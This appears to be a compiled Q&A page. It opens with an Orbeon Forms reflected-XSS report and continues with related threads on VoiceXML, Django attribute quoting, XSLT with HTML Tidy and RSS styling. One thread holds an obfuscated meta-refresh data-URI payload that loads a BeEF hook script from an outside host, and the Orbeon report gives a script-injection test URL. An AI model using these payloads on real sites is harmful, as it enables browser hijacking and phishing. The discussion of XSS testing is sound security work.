While testing Orbeon forms for vulnerabilities of the Reflected Cross Site Scripting type (https://en.wikipedia.org/wiki/Cross-site_scripting#Reflected_.28non-persistent.29) we noticed that it is possible to pass request parameters with script tags in them which can then be output using xf:output.
Shouldn't Orbeon validate (or at least sanitize) the request parameters when they are retrieved using xxf:get-request-parameter() or when they are output using xf:output to prevent this kind of security vulnerability?
I tested this with the latest version of Orbeon (orbeon-2016.3.201612302139-CE) and a Jetty container.
Note that you cannot use Tomcat since it does its own validation on request parameters and you cannot use Chrome because it sanitizes the output for you (stripping the script content).
A small sample form that demonstrates this:
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:xh="http://www.w3.org/1999/xhtml"
xmlns:xf="http://www.w3.org/2002/xforms"
xmlns:xxf="http://orbeon.org/oxf/xml/xforms">
<head>
<title>Reflected XSS</title>
<xf:model>
<xf:instance id="default">
<root xmlns="">
</root>
</xf:instance>
<xf:var name="testvar" value="xxf:get-request-parameter('test')"/>
</xf:model>
</head>
<body>
<p>This is an example to show that Orbeon is vulnerable to Reflected Cross Site Scripting attacks.</p>
<p>Access this form and pass a request parameter with some javascript like: /?test=bla%00rje1w<script>alert(1)<%2fscript></p>
<p><xf:output value="$testvar"/></p>
</body>
</html>
This turned out to be a bug related to HTML serialization. The issue is now fixed.
Separately, we can think more about whether sanitation of request parameters is needed, including rejecting or removing character #00. Form data itself should be covered because it comes in from XML requests, and XML explicitly disallows this (and a few other) characters.
Related
How I can call webservice from voice xml (vxml) document. I am using an opensource IVR project and I need to run a webservice for any given option from within the vxml document.
This is similar to this query;
how can I call a webservice from voiceXML?
However, solution is provided there but it is not
You cannot call a web service directly from a VoiceXML application. There are generally two approaches for getting data into a VoiceXML application:
Use the data element tag to make an http request. The result must be XML. You will need to parse the result with the provided DOM functions. Note, some browsers have extended features to facilitate XML parsing. This also requires a VoiceXML 2.1 compliant browser.
Transfer control to a dynamic bit of server code that returns VXML to be processed populating your desired variables. This can be done with a goto element or subdialog element.
Your question is incomplete, but I suspect I know what's bothering you.
I get information from a webservice by using
<data name="return_data" srcexpr="some_url" method="post" namelist="var1 var2 var3" />
The data I get back is inside the return_data variable. In my case, the data are in XML format, and I use JavaScript functions to extract the data I need.
As an aside, for maintainability, re-usability, and ease of reading, I personally find it useful to create separate files for the JS functions and include them via <script> into my root VoiceXML document.
Since HTML5 does not care if an attribute is enclosed by double-quotes, I used to skip them for the sake of simplicity. For example, I use:
<a href=/someURL/someArgs/>Link to some URL</a>
instead of
Link to some URL
However, I happened to read a document written by a security hacker, who indicates that if the URL is supplied by Django templates, there may be security problems. That is,
<a href={{ someURL }}>Link to some URL</a> <!-- Unsafe -->
Link to some URL <!-- Safe -->
Is that true? What kinds of security problems are there?
In my opinion, both of usages provide a similar way to insert a malicious code. It all depends on whether you always control what's in "someURL" or it's something based on input from your web user.
Some professional pentester guy told me this xss test vector is useless for pentest.And the payload seems like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
but when i'm save the code to a HTML file with more powerful javascript like hook.js (from beef exploit framework).
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on firefox and chrome.i can see the victim online with my beef exploit framework and a lot of function is available.
I dont really get it.what's wrong with this payload.I have asked this question several times but there is no response from him . it makes me very confuse.Is there any body can tell me why he said this one is useless for pentest.
XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious javascript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any javascript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR, and other such attacks it is useless for accessing anything on the hosting domain. This attack will also not work in IE since it only allows data URIs for image type elements, and I think that is even restricted to style/css.
Though meta tag injections are only successful for XSS in very limited capacity, they are still very dangerous in other attacks and are worth testing.
As far as I remember data:-URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However this could be used to deliver an exploit or for phishing, so I wouldnt call it totally useless.
I have a large number of HTML files that I need to process with XSLT, using an XML file to choose which HTML files, and what we're doing with them.
I tried:
Use HTML Tidy to convert HTML -> XHTML / XML
Use document(filename) in XSLT to read in particular XHTML/XML files
...use standard nodeset commands to access e.g. "html/body/*"
This doesn't work, because:
It seems that XSLT (tried: libXSLT/xsltproc ... and Saxon) cannot process XHTML documents as external files (it sees the xhtml DOCTYPE, and refuses to parse it as nodes).
Fine (I thought) ... XHTML is just XML, I just need to put it through HTML Tidy and say:
"output-xml yes ... output-html no ... output-xhtml no"
...but HTML Tidy ignores you if you attempt that, and forces html instead :(. It seems to be hardcoded to only output XML files if the input was XML to begin with.
Any ideas for how to:
Force HTML Tidy to obey the command-line parameters, and set the doctype I asked for
Force XSLTproc to parse xhtml DOCTYPEs as xml
...some other cunning way that will work?
NB: this has to work on OS X - it's part of a build process for iOS apps. That shouldn't be a big problem, but e.g. any windows-only tools aren't available. I'd like to achieve this with standard open-source cross-platform tools (like tidy, libxslt, etc)
I finally discovered why XSLTproc / Saxon were refusing to parse the files if they were passed-in with a DOCTYPE html:
The DOCTYPE of the external document alters how they interpret the
xmlns (namespace) directive. Tidy was declaring (correctly)
"xmlns=...the xhtml: namespace" - so all my node-names were ... I don't know: non-existent? ... inside my XSLT. XSLT was just ignoring them, as if they didn't exist - it needed me to provide a compatible mapping to the same namespace
...strangely, if the DOCTYPE was xml, then they happily ignored the xmlns command - or they allowed me to reference nodes by unqualified name. This fooled me into thinking that they were point-blank ignoring the nodesets inside the xhtml DOCTYPE'd version.
So, the "solution" is something like this:
modify your XSLT stylesheet to ALSO import the "xhtml" namespace - NB: this is required so that you can reference the nodes in the external files
write all your XSL match / select / template rules with the "xhtml" prefix on every node (and every attribute, I think?)
let Tidy output whatever it wants: it doesn't matter, it'll Just Work, once you have the namespace support in there
Example code:
Your stylesheet goes from this:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
...to this:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml">
Your select / match / document-import goes from this:
<xsl:copy-of select="document('html-files/file1.htm')/html/body"/>
...to this:
<xsl:copy-of select="document('html-files/file1.htm')/xhtml:html/xhtml:body"/>
NB: just to be clear: if you ignore namespaces, then it seems XSLT will work on files that are unDOCTYPED, even if they have a namespace in them. Don't make the mistake I made of thinking your XSLT is correct just because it appears to be :)
XHTML is XML (if it is valid).
To get your XHTML processed as XML, you must not serve it as "text/html" MIME. Use application/xhtml+xml instead (keep in mind, that IE6 does not support to render this and will prompt a download window for your site).
In PHP do you serve it as xhtml+xml with the header() function.
I think this should do the trick:
header('Content-Type: application/xhtml+xml');
Does this help?
If you run xsltproc --help, among the accepted input flags is a very conspicuous one called --html which supposedly tells xsltproc that:
--html: the input document is(are) an HTML file(s)
Presumably for this to work you must have valid HTML files to begin with, though. So you might want to tidy them up first.
I think the main problem is given by the XML catalog doctype declaration. You can test this by removing the external entity reference in the input XHTML and see if the processor correctly works with it.
I would do as follows:
Use Tidy with doctype omit option.
Add the Doctype at XSLT side as described here
The main problem is that Saxon and xsltproc has not any option to disable external entities resolution. This is supported by MSXSL.exe command line utility with option -xe.
It's been a while, but I remember trying to use HTMLTidy to prep HTML files for XSLT and was disappointed by how easily it gave up while trying to "well form" the HTML. Then I found TagSoup, and was very pleased.
TagSoup also includes a command-line processor that reads HTML files and can generate either clean HTML or well-formed XML that is a close approximation to XHTML.
I don't know if you're bound to HTMLTidy, but if not try this: http://home.ccil.org/~cowan/tagsoup/
As an example, here's a bad HTML file:
<body>
<p>Testing
</body>
And here's the tagsoup command and its ouput:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html bad.html
src: bad.html
<html><body>
<p>Testing
</p></body></html>
Edit 01
Here is how tagsoup handles DOCTYPEs.
Here's a bad HTML file with a valid DOCTYPE:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<body>
<p>Testing
</body>
</html>
Here's how tagsoup handles it:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html bad.html
src: bad.html
<html><body>
<p>Testing
</p></body></html>
It isn't until you explicitly pass a DOCTYPE to tagsoup that it attempts to output one:
~ zyoung$ java -jar /usr/local/tagsoup-1.2.jar --html --doctype-public=html bad.html
src: bad.html
<!DOCTYPE PUBLIC "html" "">
<html><body>
<p>Testing
</p></body></html>
I hope this helps,
Zachary
Back in about 2006, I wrote a nice XSLT that transformed my RSS feeds into custom HTML. That way if a user clicked from a browser it would display as a simple page rather than a bunch of junk XML. If that same URL was used in a feed reader it was handled properly and everything was slick.
Now days, most browsers (IE, Firefox, Safari, Opera) seem to grab hold of the styles and won't let go. And Chrome just plain ignores the stylesheet transformation.
Given that it has been several years, am I simply forgetting some detail? Didn't it used to just be this easy?
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="/atom2html.xslt"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<!-- ... -->
</feed>
Anyone know if there is a way to override those browsers with very specific ideas of feed styling? And is there any way to get something nice out of Chrome?
Chrome appears to only apply the XSLT processing instruction if the Content-Type for the feed response is set to XML, not Atom.
This displays XSLT in Chrome:
Content-Type: application/xml
This does not display any styling (which is technically the more correct type):
Content-Type: application/atom+xml
It is now default behaviour for most browser to apply their own XSLT to any Atom/RSS feed they come across, very annoying. A feed is identified through the application/atom+xml mime type for Atom and application/rss+xml for RSS
You used to be able to circumvent this by filling the first 512 bytes of the feed with crud in the form of a comment. This would throw off the feed sniffing of the browser and allow you to apply your own XSL Stylesheet. This has worked for years for me but with IE8 this behaviour has gone out of the window and the 512 bytes comment doesn't work anymore. I have now switched over to server side processing but I still lament this decision from browser makes.
I'm not aware of a way to fool IE & FF & Safari's automatic display of RSS/Atom feeds, but in Chrome the XSLT is correctly applied via the xml-stylesheet processing instruction; here is an example from the Randonneur Group pool at flickr.